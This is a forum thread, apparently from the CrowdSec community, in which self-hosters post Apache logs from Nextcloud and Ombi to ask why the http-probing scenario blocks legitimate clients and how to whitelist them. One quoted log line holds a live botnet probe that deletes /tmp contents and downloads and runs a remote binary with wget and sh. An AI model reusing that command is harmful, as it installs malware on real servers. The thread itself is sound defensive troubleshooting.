xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/apps/theming/img/core/filetypes/package-x-generic.svg?v=0 HTTP/1.1" 200 1223 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=4441 HTTP/1.1" 404 857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=20714 HTTP/1.1" 404 857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=4768 HTTP/1.1" 404 857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=191296 HTTP/1.1" 404 857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=257268 HTTP/1.1" 200 7218 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:05 +0200] "GET /nextcloud/core/img/rating/s4.svg HTTP/1.1" 200 2040 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"

I would like to know why I get blocked and stuff like this not:

95.137.137.171 - - [07/Aug/2022:23:27:34 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ qwugdsabbdsdeeeeb212c.bydthkk.top/jaws;sh+/tmp/jaws" 400 483 "-" "-"
106.75.50.30 - - [08/Aug/2022:10:59:31 +0200] "GET / HTTP/1.1" 200 5563 "-" "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8"
106.75.50.30 - - [08/Aug/2022:10:59:36 +0200] "GET /favicon.ico HTTP/1.1" 404 5693 "-" "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8"
106.75.50.30 - - [08/Aug/2022:10:59:36 +0200] "GET /sitemap.xml HTTP/1.1" 404 5693 "-" "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8"
106.75.50.30 - - [08/Aug/2022:10:59:38 +0200] "GET /robots.txt HTTP/1.1" 404 5693 "-" "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8"
11

Hello,

Given the behavior of ombi, I do not a see a “generic” workaround for this (it would require crowdsec to do smart things and be too sensitive to false negatives).

I think the best way would be to have a whitelist for ombi to avoid this specific false positive. It should even be part of the ombi collection created by @lepresidente : CrowdSec Hub

Do you believe this false positive impacts all the default setups ?

12

Hi,

I’m also having some difficulties with nextcloud 25.01 and crowdsec. A specific user is systematically blocked, when using the client or a webdav mount in the file explorer, from a Windows 10 system. I think that this user is being blocked because he’s trying to set up his environment and thus adding and moving (or at least trying to add or move) a lot of files in a short period. But I cannot find what is triggering the alerts and decisions, except that it’s systematically the same reason: http-probing.

I nonetheless tried to set a whitelist, but my attemps so far didn’t succeed.

Crowdsec version:

❯ cscli version
2022/11/29 21:02:23 version: v1.4.2-debian-pragmatic-3beb84bcfe05885fdd9a00f3124b4a949e45ce82
2022/11/29 21:02:23 Codename: alphaga
2022/11/29 21:02:23 BuildDate: 2022-11-15_12:45:52
2022/11/29 21:02:23 GoVersion: 1.19.2
2022/11/29 21:02:23 Platform: linux
2022/11/29 21:02:23 Constraint_parser: >= 1.0, <= 2.0
2022/11/29 21:02:23 Constraint_scenario: >= 1.0, < 3.0
2022/11/29 21:02:23 Constraint_api: v1
2022/11/29 21:02:23 Constraint_acquis: >= 1.0, < 2.0

Alert 1, with the corresponding apache log. The cscli time is UTC, and my server is on UTC+01:00.

❯ cscli alerts inspect xxxx

################################################################################################

 - ID         : xxxx
 - Date       : 2022-11-29T15:49:02Z
 - Machine    : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 - Simulation : false
 - Reason     : crowdsecurity/http-probing
 - Events Count : 13
 - Scope:Value: Ip:xxx.xxx.xxx.xxx
 - Country    : CH
 - AS         : Corp Inc.
 - Begin      : 2022-11-29 15:48:37.644899066 +0000 UTC
 - End        : 2022-11-29 15:49:01.412840179 +0000 UTC



xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7585 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:36 +0100] "PROPFIND /cloud/remote.php/dav/files/<user> HTTP/1.1" 207 2345 "-" "Microsoft-WebDAV-MiniRedir/10.0.19044"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "PROPFIND /cloud/remote.php/dav/files/<user> HTTP/1.1" 207 3010 "-" "Microsoft-WebDAV-MiniRedir/10.0.19044"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7585 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "PROPFIND /cloud/remote.php/dav/files/<user>/desktop.ini HTTP/1.1" 404 1116 "-" "Microsoft-WebDAV-MiniRedir/10.0.19044"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "PROPFIND /cloud/remote.php/dav/files/<user>/desktop.ini HTTP/1.1" 404 1241 "-" "Microsoft-WebDAV-MiniRedir/10.0.19044"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7583 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:37 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "PROPFIND /cloud/remote.php/dav/files/<user>/AutoRun.inf HTTP/1.1" 404 1241 "-" "Microsoft-WebDAV-MiniRedir/10.0.19044"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "PROPFIND /cloud/remote.php/dav/files/<user> HTTP/1.1" 207 3036 "-" "Microsoft-WebDAV-MiniRedir/10.0.19044"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7585 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:38 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:39 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7599 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:48 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7601 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7603 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:49 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:50 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7599 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:55 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7601 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:56 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:57 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:57 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:57 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:57 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:57 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:57 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:48:59 +0100] "GET /cloud/ocs/v2.php/apps/notifications/api/v2/notifications HTTP/1.1" 304 7054 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Viewer/99.9.3878.79"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012724915251034f3b47f&x=256&y=256 HTTP/1.1" 404 6535 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012829845251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012836525251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012836035251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012836795251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012835565251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012835745251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012836325251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:00 +0100] "GET /cloud/index.php/core/preview?fileId=012835465251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
